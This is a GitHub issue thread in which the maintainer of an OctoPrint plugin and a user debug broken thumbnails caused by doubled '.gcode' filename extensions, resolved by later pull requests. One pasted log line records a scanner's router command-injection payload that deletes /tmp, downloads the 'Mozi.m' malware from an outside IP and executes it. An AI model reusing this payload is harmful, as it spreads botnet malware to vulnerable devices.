jneilliii/OctoPrint-UltimakerFormatPackage #34: Images are broken after 1.5.3 Octoprint update

arut16, 2021-01-21:
Hi everyone,

Images seems to be broken are the last update... 
[image]

Using last version of the plugin : 0.2.1.

jneilliii, 2021-01-22:
Your the first to report @arut16, do you have any errors in your octoprint.log when uploading the file?

jneilliii, 2021-01-22:
I've just finished testing on two separate installations of OctoPrint 1.5.3, one on python 2.7 and one on Python 3.7 and both are still working for me.

arut16, 2021-01-22:
@jneilliii Here a little extraction from octoprint.log when I uploaded gcodes files from cura directely :

`2021-01-21 23:25:35,932 - tornado.access - WARNING - 404 GET /plugin/UltimakerFormatPackage/thumbnail/1h24min_satisfying_object.png.png?20210121225734 (::ffff:192.168.1.26) 1.46ms
2021-01-21 23:25:35,936 - tornado.access - WARNING - 404 GET /plugin/UltimakerFormatPackage/thumbnail/6h43min_satisfying_object.png.png?20210121230208 (::ffff:192.168.1.26) 1.41ms
2021-01-21 23:25:36,334 - octoprint.plugins.psucontrol - DEBUG - isPSUOn: True
2021-01-21 23:25:41,336 - octoprint.plugins.psucontrol - DEBUG - isPSUOn: True
2021-01-21 23:25:46,338 - octoprint.plugins.psucontrol - DEBUG - isPSUOn: True
2021-01-21 23:25:46,775 - tornado.access - WARNING - 404 GET /plugin/UltimakerFormatPackage/thumbnail/1h24min_satisfying_object.png.png?20210121225734 (::ffff:192.168.1.78) 3.17ms
2021-01-21 23:25:48,460 - octoprint.printer.standard.job - INFO - Print job selected - origin: local, path: 1h24min_satisfying_object.gcode.gcode, owner: arut, user: arut
2021-01-21 23:25:48,479 - octoprint.plugins.DisplayLayerProgress - INFO - File '/home/pi/.octoprint/uploads/1h24min_satisfying_object.gcode.gcode' selected. Determining number of layers.
2021-01-21 23:25:48,484 - octoprint.plugins.DisplayLayerProgress - INFO - Read total height from MetaFile
2021-01-21 23:25:48,511 - octoprint.util.comm - INFO - Changing monitoring state from "Operational" to "Starting"
2021-01-21 23:25:48,546 - octoprint.util.comm - INFO - Communication timeout while printing, trying to trigger response from printer.
2021-01-21 23:25:51,090 - octoprint.plugins.DisplayLayerProgress - INFO - Store layer count in MetaFile
2021-01-21 23:25:51,155 - octoprint.plugins.DisplayLayerProgress - INFO - File select-event processing done!'
2021-01-21 23:25:51,334 - octoprint.printer.standard.job - INFO - Print job started - origin: local, path: 1h24min_satisfying_object.gcode.gcode, owner: arut, user: arut
2021-01-21 23:25:51,342 - octoprint.plugins.psucontrol - DEBUG - isPSUOn: True
2021-01-21 23:25:51,367 - octoprint.util.comm - INFO - M110 detected, setting current line number to 0
2021-01-21 23:25:51,385 - octoprint.util.comm - INFO - Changing monitoring state from "Starting" to "Printing"`

I tryed to save gcode file in ufp format and then upload it manually to octoprint : 
[image]
I get that error : 
[image]
Strange : files seems to have two times .gcode extension : XXX.gcode.gcode
[image]
```
2021-01-22 07:00:25,942 - octoprint.plugins.psucontrol - DEBUG - isPSUOn: True
2021-01-22 07:00:30,944 - octoprint.plugins.psucontrol - DEBUG - isPSUOn: True
2021-01-22 07:00:35,946 - octoprint.plugins.psucontrol - DEBUG - isPSUOn: True
2021-01-22 07:00:38,184 - tornado.access - WARNING - 404 GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://115.58.199.241:34857/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 (::ffff:115.58.199.241) 7.77ms
2021-01-22 07:00:40,719 - octoprint.plugins.DisplayLayerProgress - INFO - FilePreProcessor. Checking LayerExpressions.
2021-01-22 07:00:40,720 - octoprint.plugins.DisplayLayerProgress - INFO - FilePreProcessor. LayerExpression valid. Start processing...
2021-01-22 07:00:40,732 - octoprint - ERROR - Exception on /api/files/local [POST]
Traceback (most recent call last):
  File "/home/pi/oprint/lib/python3.7/site-packages/flask/app.py", line 2447, in wsgi_app
    response = self.full_dispatch_request()
  File "/home/pi/oprint/lib/python3.7/site-packages/flask/app.py", line 1952, in full_dispatch_request
    rv = self.handle_user_exception(e)
  File "/home/pi/oprint/lib/python3.7/site-packages/flask/app.py", line 1821, in handle_user_exception
    reraise(exc_type, exc_value, tb)
  File "/home/pi/oprint/lib/python3.7/site-packages/flask/_compat.py", line 39, in reraise
    raise value
  File "/home/pi/oprint/lib/python3.7/site-packages/flask/app.py", line 1950, in full_dispatch_request
    rv = self.dispatch_request()
  File "/home/pi/oprint/lib/python3.7/site-packages/flask/app.py", line 1936, in dispatch_request
    return self.view_functions[rule.endpoint](**req.view_args)
  File "/home/pi/oprint/lib/python3.7/site-packages/octoprint/server/util/flask.py", line 1539, in decorated_view
    return func(*args, **kwargs)
  File "/home/pi/oprint/lib/python3.7/site-packages/octoprint/vendor/flask_principal.py", line 199, in _decorated
    rv = f(*args, **kw)
  File "/home/pi/oprint/lib/python3.7/site-packages/octoprint/server/api/files.py", line 593, in uploadGcodeFile
    display=canonFilename,
  File "/home/pi/oprint/lib/python3.7/site-packages/octoprint_PrintTimeGenius/__init__.py", line 554, in new_add_file
    return self._file_manager.original_add_file(destination, path, file_object, links, allow_overwrite, printer_profile, None, display)
  File "/home/pi/oprint/lib/python3.7/site-packages/octoprint/filemanager/__init__.py", line 743, in add_file
    display=display,
  File "/home/pi/oprint/lib/python3.7/site-packages/octoprint/filemanager/storage.py", line 922, in add_file
    file_object.save(file_path)
  File "/home/pi/oprint/lib/python3.7/site-packages/octoprint/filemanager/util.py", line 105, in save
    shutil.copyfileobj(source, dest)
  File "/home/pi/oprint/lib/python3.7/shutil.py", line 79, in copyfileobj
    buf = fsrc.read(length)
  File "/home/pi/oprint/lib/python3.7/site-packages/octoprint/filemanager/util.py", line 214, in read
    line = self.input_stream.readline()
[... cut ...]
2021-01-22 07:00:45,950 - octoprint.plugins.psucontrol - DEBUG - isPSUOn: True
2021-01-22 07:00:50,953 - octoprint.plugins.psucontrol - DEBUG - isPSUOn: True
2021-01-22 07:00:55,955 - octoprint.plugins.psucontrol - DEBUG - isPSUOn: True
2021-01-22 07:00:58,603 - octoprint.server.heartbeat - INFO - Server heartbeat <3
2021-01-22 07:01:00,957 - octoprint.plugins.psucontrol - DEBUG - isPSUOn: True
2021-01-22 07:01:05,959 - octoprint.plugins.psucontrol - DEBUG - isPSUOn: True
2021-01-22 07:01:10,962 - octoprint.plugins.psucontrol - DEBUG - isPSUOn: True

```

arut16, 2021-01-22:
PS : When uploading a "simple" gcode file without ufp format. It's uploading without errors but, obviously, I haven't the thumbnail...

jneilliii, 2021-01-22:
Could you try with cancelObjects and DisplayLayerProgress disabled? I don't have either of those plugins and they are throwing errors it seems. Also, if you drag your full octoprint.log into a comment here to upload it might help me see a bigger picture.

arut16, 2021-01-22:
@jneilliii I tryed to disable CancelObjects and DisplayLayerProgress Plugins but same problem and thrumnails worked before with this two plugins (DisplayLayerProgress is mandatory for my OctoDash screen).
Here the full Octoprint.log : https://we.tl/t-NTAlZEqXPH (19Mo on WeTransfer)

jneilliii, 2021-01-22:
huh, it appears as if the metadata being set for the files is duplicating the file extension. so the file that should be `/plugin/UltimakerFormatPackage/thumbnail/2h19min_satisfying_object.png`  is being set as `/plugin/UltimakerFormatPackage/thumbnail/2h19min_satisfying_object.png.png` plus a little cache buster at the end after the `?` mark. I'm not sure why I'm not able to reproduce this, but let me check over the weekend.

arut16, 2021-01-23:
@jneilliii It's very strange but without changing anything, I uploaded a new print job today and thumbnail is back ! By it self... 
[image]

jneilliii, 2021-01-23:
That is so strange. Try this for me. Create a folder in the file list and move one of the broken files into that new folder and tell me if the thumbnail comes back.

arut16, 2021-01-23:
@jneilliii I did what you asked, and files are still broken in a folder.
BUT I think I found the source of the problem : my original stl file was been named by the designer as NAME.gcode.stl and then Cura sended gcode file to Octoprint new name is NAME.gcode.gcode : Octoprint connexion plugin is lost and issued with this broken thumbnail...
**https://www.thingiverse.com/thing:2346367/files**
[image]

jneilliii, 2021-01-23:
Ahh, that makes sense then, every `.gcode` in that filename gets replaced by `.png` by my plugin which might be causing problems somewhere in the extraction process. By chance if you could look in the folder `~/.octoprint/data/UltimakerFormatPackage/` do you see a file named `2h19min_satisfying_object.png`?

arut16, 2021-01-23:
@jneilliii yes almost :

pi@octopi:~ $ ls ~/.octoprint/data/UltimakerFormatPackage/
0h56min_Rake_4_Prongs.gcode
0h56min_Rake_4_Prongs.png
10h54min_RoboHand_v75.gcode
10h54min_RoboHand_v75.png
2h19min_satisfying_object.gcode.png
pi@octopi:~ $

jneilliii, 2021-01-23:
Yep, it's what I suspected. One of my replaces is messing up somewhere. I'll see if I can fix that. In the meantime, make sure they're not named with `.gcode.stl`, seems like that would be pretty rare.

jneilliii, 2021-01-23:
I want to keep this open to handle these rare cases. It shouldn't take too much effort to change my replace command to handle just the last `.gcode`.

PR #44 (2021-05-22): duplicated gcode extensions
fix issues related to filenames with `.gcode.gcode` instead of just `filename.gcode`, resolves #34
PR #46 (2021-06-02): 1.0.1
* fix issues related to odd file naming, resolves #34
* fix incorrect jQuery selector for image when switching files, resolves #45
closed 2021-06-02 by jneilliii